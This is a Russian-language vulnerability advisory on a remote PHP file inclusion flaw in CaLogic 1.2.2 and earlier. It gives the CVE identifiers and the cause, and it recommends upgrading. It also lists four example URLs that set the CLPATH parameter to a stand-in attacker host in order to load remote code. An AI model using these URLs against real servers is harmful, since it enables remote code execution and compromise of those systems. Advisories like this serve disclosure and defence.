PHP-инклюдинг в CaLogic

Дата публикации:	22.07.2005
Дата изменения:	15.05.2008
Всего просмотров:	1290
Опасность:	Высокая
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	CVE-2005-2321 CVE-2006-2570
Вектор эксплуатации:	Удаленная
Воздействие:	Компрометация системы
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	CaLogic 1.x
	Уязвимые версии: CaLogic 1.2.2 и более ранние версии Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре CLPATH при включенных опциях register_globals и allow_url_fopen в конфигурационном файле PHP. Злоумышленник может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Примеры: http://[vitim]/calogic/cl_minical.php?CLPATH=http://attacker http://[vitim]calogic/clmcpreload.php?CLPATH=http://attacker http://[vitim]/calogic/mcconfig.php?CLPATH=http://attacker http://[vitim]/calogic/mcpi-demo.php?CLPATH=http://attacker URL производителя: www.calogic.de Решение: Установите последнюю версию 1.2.2 от 2005-07-19 с сайта производителя.
Ссылки:	Vulnerability in CaLogic

PHP-инклюдинг в CaLogic

Подпишитесь на email рассылку